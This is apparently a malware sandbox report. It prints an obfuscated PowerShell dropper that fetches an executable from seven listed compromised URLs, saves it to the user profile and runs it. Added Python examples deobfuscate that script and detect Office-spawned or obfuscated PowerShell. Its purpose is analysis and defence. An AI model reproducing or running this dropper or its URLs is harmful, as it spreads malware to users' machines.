
General

  • Target

    f01d6d3b9c98457e3843692915af1efa_JaffaCakes118

  • Size

    241KB

  • Sample

    240921-s52bcszela

  • MD5

    f01d6d3b9c98457e3843692915af1efa

  • SHA1

    dd4724db788347778cd9f8a15bb8e67e6e445739

  • SHA256

    1dba1999448c671df16e2a851f3333c25852991b9e4e9218fe5f59c4892750b9

  • SHA512

    c7f0210f9349734b4795539a44eac52788c64785213f9a2b2eb5c2bf188dd5202c7026e457be1e9d725a7ce1fbed60e6d46daabe84d76dd81cec18f0c210ad2f

  • SSDEEP

    3072:wYy0u8YGgjv+ZvchmkHcI/o1/Vb6///////////////////////////////////j:40uXnWFchmmcI/o1/YOfAx

Score
10/10

Malware Config

Extracted

Language
ps1
Source
$C6d_2s8=(('Mw'+'w')+'k1'+'nm');&('ne'+'w'+'-item') $EnV:USerPROFile\G10pgi8\ZTTxB4O\ -itemtype dIrEcTOry;[Net.ServicePointManager]::"SE`cUR`ITyproTOc`OL" = (('t'+'ls1')+'2'+(','+' tl')+('s'+'11, ')+'tl'+'s');$W0lji9e = ('F'+'ux'+('8'+'6v'));$Kslf6uf=(('Bvi'+'gn')+'6e');$Qo4fnc3=$env:userprofile+(('{0'+'}'+'G10pgi8{0'+'}Zttxb4o{0}') -F [chAR]92)+$W0lji9e+('.'+('e'+'xe'));$T579vww=('Q'+('hop'+'s')+'fr');$Wcu1otx=&('ne'+'w-objec'+'t') nEt.WebcLIeNt;$Dj4qjax=(('http'+'://ww'+'w'+'.ksg')+('res'+'ear'+'ch'+'.org/LLC'+'/'+'z9B/*')+'h'+('tt'+'p')+(':'+'//ww')+('w.mitr'+'au'+'sah')+'a'+('co'+'ntr')+'uc'+'io'+'n'+'.c'+'o'+('m'+'/m')+('ult'+'i'+'fu'+'nction'+'al-se')+('ct'+'i')+'on'+'/'+'X2'+('v4X'+'N/')+('*h'+'t')+'t'+('p:'+'//da'+'pr'+'ofes'+'iona'+'l.')+'c'+'o'+('m/dat'+'a4/rs'+'dbA')+'1h'+('/'+'*http')+('://de'+'g'+'is')+'i'+('mkalip'+'.')+('c'+'om.tr/')+('wp-ad'+'min'+'/ZML/'+'*')+'ht'+('tp:'+'//da')+('-in'+'du')+'s'+('tr'+'i')+'a'+'l'+('.'+'com/js/'+'6')+('GGA48'+'AK/'+'*')+('h'+'ttp:')+('/'+'/cse-e')+('ng'+'i')+'n'+('eer'+'.com'+'/c'+'gi-bin/BO'+'iL/')+'*h'+('tt'+'p')+(':/'+'/casa')+('be'+'etho')+('venlb'+'.')+('c'+'om/c'+'las')+('ses/7S'+'U')+('l'+'G/'))."s`PlIT"([char]42);$Nmyspmc=(('Jqu'+'1')+('rg'+'_'));foreach($Blu7x4_ in $Dj4qjax){try{$Wcu1otx."Do`WnLOA`dF`iLe"($Blu7x4_, $Qo4fnc3);$Cj7c0y9=('W'+('ut'+'x')+('g1'+'y'));If ((&('G'+'et-Item') $Qo4fnc3)."LEng`Th" -ge 38152) {.('Invo'+'ke'+'-Ite'+'m')($Qo4fnc3);$Ayagw7p=('J'+('vec8'+'k')+'q');break;$Cmjkpj6=(('Wx64p'+'n')+'x')}}catch{}}$Qwqs0er=(('Ll'+'vd')+('41'+'_'))
URLs
exe.dropper

http://www.ksgresearch.org/LLC/z9B/

exe.dropper

http://www.mitrausahacontrucion.com/multifunctional-section/X2v4XN/

exe.dropper

http://daprofesional.com/data4/rsdbA1h/

exe.dropper

http://degisimkalip.com.tr/wp-admin/ZML/

exe.dropper

http://da-industrial.com/js/6GGA48AK/

exe.dropper

http://cse-engineer.com/cgi-bin/BOiL/

exe.dropper

http://casabeethovenlb.com/classes/7SUlG/
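Added example, not tria.ge's extractor and not part of the report: a static deobfuscator for the Source above. It embeds that script verbatim, never executes it, and instead rewrites the string-building tricks the dropper relies on ('a'+'b' concatenation, ('x') wrapping, [char]N casts, the '{0}' -F format operator, back`tick-split member names, single-literal variables) until the text stops changing, then pulls out what an analyst wants from it. The rule set, the result field names and the rendering of $env:userprofile as %USERPROFILE% are this example's own choices.

```python
"""Static deobfuscation of the extracted ps1 dropper (added example)."""
import re

# The Source from the Malware Config section, embedded verbatim. It is a
# single line in the report; the line breaks below are removed before use.
SCRIPT = r'''
$C6d_2s8=(('Mw'+'w')+'k1'+'nm');&('ne'+'w'+'-item') $EnV:USerPROFile\G10pgi8\ZTTxB4O\ -itemtype dIrEcTOry;
[Net.ServicePointManager]::"SE`cUR`ITyproTOc`OL" = (('t'+'ls1')+'2'+(','+' tl')+('s'+'11, ')+'tl'+'s');
$W0lji9e = ('F'+'ux'+('8'+'6v'));$Kslf6uf=(('Bvi'+'gn')+'6e');
$Qo4fnc3=$env:userprofile+(('{0'+'}'+'G10pgi8{0'+'}Zttxb4o{0}') -F [chAR]92)+$W0lji9e+('.'+('e'+'xe'));
$T579vww=('Q'+('hop'+'s')+'fr');$Wcu1otx=&('ne'+'w-objec'+'t') nEt.WebcLIeNt;
$Dj4qjax=(('http'+'://ww'+'w'+'.ksg')+('res'+'ear'+'ch'+'.org/LLC'+'/'+'z9B/*')+'h'+('tt'+'p')+(':'+'//ww')
+('w.mitr'+'au'+'sah')+'a'+('co'+'ntr')+'uc'+'io'+'n'+'.c'+'o'+('m'+'/m')+('ult'+'i'+'fu'+'nction'+'al-se')
+('ct'+'i')+'on'+'/'+'X2'+('v4X'+'N/')+('*h'+'t')+'t'+('p:'+'//da'+'pr'+'ofes'+'iona'+'l.')+'c'+'o'
+('m/dat'+'a4/rs'+'dbA')+'1h'+('/'+'*http')+('://de'+'g'+'is')+'i'+('mkalip'+'.')+('c'+'om.tr/')
+('wp-ad'+'min'+'/ZML/'+'*')+'ht'+('tp:'+'//da')+('-in'+'du')+'s'+('tr'+'i')+'a'+'l'+('.'+'com/js/'+'6')
+('GGA48'+'AK/'+'*')+('h'+'ttp:')+('/'+'/cse-e')+('ng'+'i')+'n'+('eer'+'.com'+'/c'+'gi-bin/BO'+'iL/')+'*h'
+('tt'+'p')+(':/'+'/casa')+('be'+'etho')+('venlb'+'.')+('c'+'om/c'+'las')+('ses/7S'+'U')+('l'+'G/'))."s`PlIT"([char]42);
$Nmyspmc=(('Jqu'+'1')+('rg'+'_'));foreach($Blu7x4_ in $Dj4qjax){try{$Wcu1otx."Do`WnLOA`dF`iLe"($Blu7x4_, $Qo4fnc3);
$Cj7c0y9=('W'+('ut'+'x')+('g1'+'y'));If ((&('G'+'et-Item') $Qo4fnc3)."LEng`Th" -ge 38152) {.('Invo'+'ke'+'-Ite'+'m')($Qo4fnc3);
$Ayagw7p=('J'+('vec8'+'k')+'q');break;$Cmjkpj6=(('Wx64p'+'n')+'x')}}catch{}}$Qwqs0er=(('Ll'+'vd')+('41'+'_'))
'''.replace("\n", "")

LIT = r"'([^']*)'"  # one single-quoted PowerShell literal ('' escapes do not occur here)


def normalize_member_names(src: str) -> str:
    """Turn "Do`WnLOA`dF`iLe" into "downloadfile": drop backticks, lowercase."""
    return re.sub(r'"([^"]*)"',
                  lambda m: '"' + m.group(1).replace("`", "").lower() + '"', src)


FOLD_RULES = [
    # [chAR]92 -> '\'   (the type name is case-insensitive in PowerShell)
    (re.compile(r"\[char\]\s*(\d+)", re.I),
     lambda m: "'" + chr(int(m.group(1))) + "'"),
    # 'a'+'b' -> 'ab'   (assumes no literal begins with '+', which holds here)
    (re.compile(LIT + r"\s*\+\s*" + LIT),
     lambda m: "'" + m.group(1) + m.group(2) + "'"),
    # ('ab') -> 'ab'
    (re.compile(r"\(\s*" + LIT + r"\s*\)"), lambda m: "'" + m.group(1) + "'"),
    # ('x{0}y' -F 'z') -> 'xzy'
    (re.compile(r"\(\s*" + LIT + r"\s+-[fF]\s+" + LIT + r"\s*\)"),
     lambda m: "'" + m.group(1).replace("{0}", m.group(2)) + "'"),
]


def fold_strings(src: str) -> str:
    """Apply FOLD_RULES until a full pass changes nothing (fixed point)."""
    while True:
        before = src
        for pattern, repl in FOLD_RULES:
            src = pattern.sub(repl, src)
        if src == before:
            return src


# $name = 'literal' where the literal is the whole right-hand side
ASSIGN = re.compile(r"\$(\w+)\s*=\s*" + LIT + r"(?=\s*(?:[;}]|$))")


def inline_literal_variables(src: str) -> str:
    """Replace later uses of $name by the literal it was assigned."""
    for name, value in ASSIGN.findall(src):
        src = re.sub(r"\$" + re.escape(name) + r"\b(?!\s*=)",
                     lambda m, v=value: "'" + v + "'", src)
    return src


def deobfuscate(src: str) -> str:
    src = fold_strings(normalize_member_names(src))
    return fold_strings(inline_literal_variables(src))


def extract_iocs(src: str) -> dict:
    clean = deobfuscate(src)
    urls = []
    for lit in re.findall(LIT, clean):
        if "://" in lit:
            for url in lit.split("*"):  # [char]42 is '*', the ."split" separator
                if url and url not in urls:
                    urls.append(url)
    drop = re.search(r"\$env:userprofile\s*\+\s*" + LIT, clean, re.I)
    size = re.search(r"-ge\s+(\d+)", clean)  # minimum length before Invoke-Item
    return {
        "urls": urls,
        "drop_path": "%USERPROFILE%" + drop.group(1) if drop else None,
        "min_size": int(size.group(1)) if size else None,
        "members": sorted(set(re.findall(r'[.:]"(\w+)"', clean))),
    }


if __name__ == "__main__":
    for key, value in extract_iocs(SCRIPT).items():
        print(key, value)
```

The urls entry comes out as the same seven exe.dropper URLs listed above, in the same order the script tries them; drop_path shows where the first successful download is written, and min_size (38152) is the length a downloaded file must reach before the script runs it with Invoke-Item and stops iterating.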

Targets

    • Target

      f01d6d3b9c98457e3843692915af1efa_JaffaCakes118

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Blocklisted process makes network request

    • Drops file in System32 directory
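The signature bullets describe behaviour, not how to detect it. As an added example, not a tria.ge signature, the following Python classifies process-creation and PowerShell script-block events for the first bullet (an Office parent launching a script host) together with the obfuscation markers visible in the Source above. The event field names (Sysmon event 1 ParentImage/Image/CommandLine, PowerShell event 4104 ScriptBlockText), the parent/child lists and the sample events are assumptions; the events are constructed, not taken from this report.

```python
"""Detection logic for an Office parent spawning a script host, plus
obfuscated-PowerShell content markers (added example)."""
import re

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_CHILDREN = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                   "cscript.exe", "mshta.exe"}

# Text markers of the obfuscation style seen in the extracted script above.
OBF_MARKERS = {
    "string-concat": re.compile(r"'[^']*'\s*\+\s*\(?'[^']*'"),  # 'a'+'b', 'a'+('b'
    "char-cast": re.compile(r"\[char\]\s*\d+", re.I),           # [chAR]92
    "backtick-member": re.compile(r'"[^"`]*`[^"]*"'),            # "Do`WnLOA`dF`iLe"
    "format-op": re.compile(r"\s-f\s", re.I),                    # ') -F [chAR]92'
}


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event: dict) -> list:
    """Return the reasons an event is suspicious (empty list means clean)."""
    reasons = []
    if event.get("EventID") == 1:                      # process creation
        parent = _basename(event.get("ParentImage", ""))
        child = _basename(event.get("Image", ""))
        if parent in OFFICE_PARENTS and child in SCRIPT_CHILDREN:
            reasons.append(f"office-spawned-script:{parent}>{child}")
        text = event.get("CommandLine", "")
    elif event.get("EventID") == 4104:                 # script block logging
        text = event.get("ScriptBlockText", "")
    else:
        return reasons
    hits = sorted(name for name, pat in OBF_MARKERS.items() if pat.search(text))
    if len(hits) >= 2:  # a single marker is too noisy on its own; require two
        reasons.append("obfuscated-powershell:" + ",".join(hits))
    return reasons


# Constructed sample events (assumed field names, not from the report). The
# 4104 event reuses a fragment of the extracted script: a launcher typically
# passes an encoded command, so the markers surface in script-block logs
# rather than on the process command line.
EVENTS = [
    {"EventID": 1,
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -w hidden -enco JABDADYAZABfADIAcwA4AD0A"},
    {"EventID": 4104,
     "ScriptBlockText": "$W0lji9e = ('F'+'ux'+('8'+'6v'));$Qo4fnc3=$env:userprofile"
                        "+(('{0'+'}'+'G10pgi8{0'+'}Zttxb4o{0}') -F [chAR]92)+$W0lji9e"
                        "+('.'+('e'+'xe'));$Wcu1otx.\"Do`WnLOA`dF`iLe\"($Blu7x4_, $Qo4fnc3)"},
    {"EventID": 1,
     "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -NoProfile -File C:\scripts\backup.ps1"},
]


def run(events=EVENTS) -> list:
    return [classify(e) for e in events]


if __name__ == "__main__":
    for event, reasons in zip(EVENTS, run()):
        print(event["EventID"], reasons or "clean")
```

The parent/child rule fires on the first event even though its command line is encoded, and the content markers fire on the script-block event alone; the explorer-launched scheduled script produces nothing, which is the false-positive case the two-marker threshold is meant to keep quiet.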
